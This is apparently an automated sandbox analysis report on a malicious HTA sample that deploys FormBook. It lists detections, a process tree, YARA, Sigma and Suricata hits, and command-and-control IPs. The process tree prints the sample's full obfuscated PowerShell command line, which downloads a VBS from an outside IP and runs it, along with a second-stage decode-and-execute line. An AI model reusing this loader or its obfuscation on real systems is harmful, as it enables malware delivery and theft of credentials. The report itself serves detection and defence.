Windows Analysis Report
maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta

Overview

General Information

Sample name: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta
Analysis ID: 1568883
MD5: 7b5d04515a8b84877cd75427ec392b85
SHA1: 6013f960a5832b92b2ee8347c208761dc0a24d58
SHA256: e639ef803c3d793f9f0f3a9e4bca874b78e278f9be248103b7a691dbbfbf7b69
Tags: hta, user-abuse_ch

Detection

Cobalt Strike, FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 5440 cmdline: mshta.exe "C:\Users\user\Desktop\maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 4460 cmdline: "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2872 cmdline: POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 1492 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 3472 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 3360 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 5988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = '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';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • aspnet_compiler.exe (PID: 2720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
              • lSomfUdjbC.exe (PID: 3992 cmdline: "C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • ieUnatt.exe (PID: 3360 cmdline: "C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E)
          • firefox.exe (PID: 5668 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |

Source | Rule | Description | Author | Strings
0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
11.2.aspnet_compiler.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
11.2.aspnet_compiler.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
11.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
11.2.aspnet_compiler.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x15f42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source | Rule | Description | Author | Strings
amsi32_5988.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_5988.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |

                  System Summary

Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2872, TargetFilename: C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2872, TargetFilename: C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline

                  Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2872, ParentProcessName: powershell.exe, ProcessId: 1492, ProcessName: csc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T05:38:53.469246+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49821 | 208.91.197.27 | 80 | TCP
2024-12-05T05:39:18.701814+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49886 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:33.432874+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49923 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:48.442295+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49963 | 104.21.31.249 | 80 | TCP
2024-12-05T05:40:03.279319+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49999 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:18.370663+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50009 | 162.213.249.216 | 80 | TCP
2024-12-05T05:40:33.261303+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50013 | 62.149.128.40 | 80 | TCP
2024-12-05T05:40:47.944401+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50018 | 3.33.130.190 | 80 | TCP
2024-12-05T05:41:02.765732+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50022 | 3.33.130.190 | 80 | TCP
2024-12-05T05:41:18.279464+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50026 | 154.82.100.177 | 80 | TCP
2024-12-05T05:41:53.689481+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50031 | 199.115.230.222 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T05:39:10.722550+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49863 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:13.388616+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49870 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:16.040314+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49876 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:25.456038+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49903 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:28.113587+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49910 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:30.770847+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49917 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:40.396437+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49940 | 104.21.31.249 | 80 | TCP
2024-12-05T05:39:43.051583+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49947 | 104.21.31.249 | 80 | TCP
2024-12-05T05:39:45.708858+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49955 | 104.21.31.249 | 80 | TCP
2024-12-05T05:39:55.294162+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49977 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:57.962029+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49984 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:00.619088+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49991 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:10.150210+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50005 | 162.213.249.216 | 80 | TCP
2024-12-05T05:40:12.810690+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50006 | 162.213.249.216 | 80 | TCP
2024-12-05T05:40:15.691616+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50008 | 162.213.249.216 | 80 | TCP
2024-12-05T05:40:25.293933+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50010 | 62.149.128.40 | 80 | TCP
2024-12-05T05:40:27.948398+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50011 | 62.149.128.40 | 80 | TCP
2024-12-05T05:40:30.771520+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50012 | 62.149.128.40 | 80 | TCP
2024-12-05T05:40:39.986732+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50014 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:42.635660+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50015 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:45.288783+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50016 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:54.793403+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50019 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:57.448428+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50020 | 3.33.130.190 | 80 | TCP
2024-12-05T05:41:00.248282+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50021 | 3.33.130.190 | 80 | TCP
2024-12-05T05:41:10.286313+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50023 | 154.82.100.177 | 80 | TCP
2024-12-05T05:41:12.942530+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50024 | 154.82.100.177 | 80 | TCP
2024-12-05T05:41:15.614420+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50025 | 154.82.100.177 | 80 | TCP
2024-12-05T05:41:25.333244+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50028 | 199.115.230.222 | 80 | TCP
2024-12-05T05:41:27.989483+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50029 | 199.115.230.222 | 80 | TCP
2024-12-05T05:41:30.645739+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50030 | 199.115.230.222 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T05:37:58.770647+0100 | 2858795 | 1 | A Network Trojan was detected | 192.168.2.6 | 49707 | 172.245.123.3 | 80 | TCP

                  AV Detection

                  Source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaReversingLabs: Detection: 18%
                  Source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.htaVirustotal: Detection: 24%
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Phishing

                  Source: Yara matchFile source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta, type: SAMPLE
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2201321954.00000000079FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2472760067.00000000071D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ieUnAtt.pdbGCTL source: aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001561000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001542000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2603447181.0000000001561000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lSomfUdjbC.exe, 0000000C.00000002.4512336904.0000000000DFE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: ieUnAtt.pdb source: aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001561000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001542000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2603447181.0000000001561000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: q:C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.pdb source: powershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2537409498.0000000004621000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2535339769.000000000447C000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2537409498.0000000004621000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2535339769.000000000447C000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.000000000479C000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4512419516.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002EF7C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2472760067.00000000071D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0293BFD0 FindFirstFileW,FindNextFileW,FindClose,14_2_0293BFD0

                  Software Vulnerabilities

                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 4x nop then xor eax, eax12_2_06C1EDD0
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 4x nop then pop edi12_2_06C2A086
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeCode function: 4x nop then pop edi12_2_06C1B97B
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then xor eax, eax14_2_02929B10
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then pop edi14_2_0292DC87
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then mov ebx, 00000004h14_2_046C04E0

                  Networking

                  Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49707 -> 172.245.123.3:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49821 -> 208.91.197.27:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49863 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49870 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49876 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49886 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49903 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49917 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49910 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49923 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49940 -> 104.21.31.249:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49947 -> 104.21.31.249:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49977 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49955 -> 104.21.31.249:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49963 -> 104.21.31.249:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49984 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 3.33.130.190:80
                  Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 162.213.249.216:80
